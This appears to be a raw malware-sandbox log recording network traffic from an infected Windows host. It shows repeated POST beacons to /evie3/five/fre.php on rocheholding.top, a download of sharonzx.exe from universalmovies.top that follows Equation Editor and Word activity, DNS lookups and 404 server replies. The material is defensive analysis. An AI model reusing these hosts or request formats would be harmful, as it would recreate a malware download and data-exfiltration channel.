Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_00404ED4 recv, 21_2_00404ED4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D64B8BBB-F7FA-4868-BA26-522FB5F8B8BC}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /sharonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: universalmovies.top
Source: global traffic DNS traffic detected: DNS query: rocheholding.top
Source: unknown HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6gJfvO7olfEsdyqt3RGG%2BL80oSkjC0dkl0pQDPrdA%2FOrqBRl824zYh%2FQlsYMOyTb1LhCVC2HJDcAJ7C3pkD4gvqSi%2B84qaGVYiCtS6gehR0uVH%2BdcmY70LhekTy3vlZxrwS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b2d4e8542c4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Cx05J3EhhX%2FOS64qMqLws5JP%2BEUh3VGZct31FDQXRJvKx7kiOFrgsQf0a6%2FqaxSC8WAc4IgNUS3w8YZXOcd5Bv0017KpFQTBpNxqRY67ZT3FQBncncDxNDgt26dNdVM4GsM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b3678c18cdd-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdpNFt46F1HF0%2BGP88bbvWo8Wo8ZOKgPopbyFeXlVP7lvxxjy11II5UA1hdYtSG4xCHka%2F2j8xNUiQpS58FkteOWw6wXfgaIhoHOS%2BpdsZrEQCxpwTvLy65XlkhFb2nXLzTl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b3fbcbb8cba-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWReV%2FS%2FEdrVyy5aWpznp0MnToUNd1b7OjNpheZorXyxJGnzNIBBj8KFNuC1DJFQgnlGcrL%2FQCAluFOmz8Orutys%2FNfFcl26EPkI%2FBLZ2rcvpcoJ119%2BNojt2d4BR5czoQS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b486a644345-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhrS9S1Kc1L9QFPD8Oa8i4r5L2t7fskLt%2B0Y6B7SUCz%2FibpTrid6xUEleBFB%2Fc1QGsT3WoNRedHxmd0yBOEKyKke8QWjOZYT96DaO%2BPSuXh5Xb15n4y0loRE4osrRNfwHKXf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b50ecf0179d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ziOK6F00JN8Iv0Q5k2W2so3cc%2Bl538lOy2UVbCCkkdTTWgC4THkNzxl6PAYKa3gvfWY4Pa6%2BM4e2Us0D1BR4Sp9NKE07r8jqN%2F9Z4XmuLzDSO04UvjzrDDzWdu5wOeYJb7C"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b593c6e330c-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USAS47hLYJL19JqG82%2BuJ5n4LWYWKs2k3h2IlrSTcd4VANF8U63PubUaCAm4Ku0XP5h5tk4ANMk%2FjziAAX7MTYJA%2BQQLiBRoobM%2BpYsc96d4F3FpXcnJqyJFRDK4yyQRPmjN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b5f98f272b7-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XP8Z0Vmp5YbtXny9k1gCdr8MPc6%2BqIsB60k1OhG4qGx2dM9PDV3RANOCkx7ZoTopeXLyAP6eYmQzxzxy8FBi%2FGT%2FvyPLuSmXiRppDDEhanjHjtw67HXWC9HVnqlS6PCPSst0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b657fddc3eb-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0S9DQhZ7kD1vRANZyNNLix3LteO8PLCYfRwmHPdWpAQpswfHdnPPXnUNhy54EeYkFa%2FfKpiXind6yUIf5KyUGrKdVoS20Q7UMMwkEOvgkexxcA8Yxv9dy5ZWDVwLMyat8YVr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b6bea133344-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWr2VtaSnYGrgzccJdFscUp8CgPkO80RhBa9SVqLKbu5QeSqsfZvBjTf34uqidUIi7cmqvr7%2FvqEh54A5T1i50Nz4EkoMmKm9QfFdSICRabFLnKplKxO1FYIk6TVogQvPyxI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b732caf8c75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ESxxeqkVfXF4VXFtfwLi2yGgBWfCEiyib2cgHDr8xXO8VtKl00qeb3ZBqxMO2RHaO4NclNP5NID3Q4JDHIuWRVN1e7zwzn2Q1yOfNgkCEhTjSrKxedDjzz5grPDIuAG9FnU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b789aaa1811-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbO9%2Ff51En40xXUMJXBvaPx4ztxvOLbvO7aizt%2FvCWXp2CuRTdYI7dXwfMNF80ybpsblGGrOi%2FFltB5XK%2BsjMETTkcWse8IiY3cRz%2BVNOr6Zt2rFvjP3ce9Dkxwh2V8OJ6RP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b7e2a2a8c9c-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JPT0Eb6h3KGkRsCTJfPWXIV1ZBxIfevIfmMz4YfmdnuDoOIikL0wZXbpqOXoR9SkCF9vzInM%2FmKT8KIZYcwUppVfhuSX170ub%2F1Asm3UiK4J08BeoYx7wAgaPEh1Q7gCzm9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b84e88bc46b-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxQCk6kB3AkHfa9RbBk5OmGVIy1dF7b2Zl9nv2KMmKzs%2Fv0E3GG0A2TwyCyLZdxfxT%2FVfrtBoPT2rbRPgOOOfC8DCeLIkzHj3CbD%2FZZXzwPR6X94lgLv%2FopoRvcv%2FYhxtSiZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b8a8f370cc4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXUAwumeRTn2EPKrghXM5f5O7yux9kh2yje9ZqNVBf38rZ%2Bnw%2FLLCDz9%2FPEHIAqjoFwh2Nqnz0hDhBg%2BA9E1zpC7d4qKWW9n3QsJNoFQid0JY75OR73Cg8t%2FFLfvJAJUXahH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b8ffc4d19ef-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
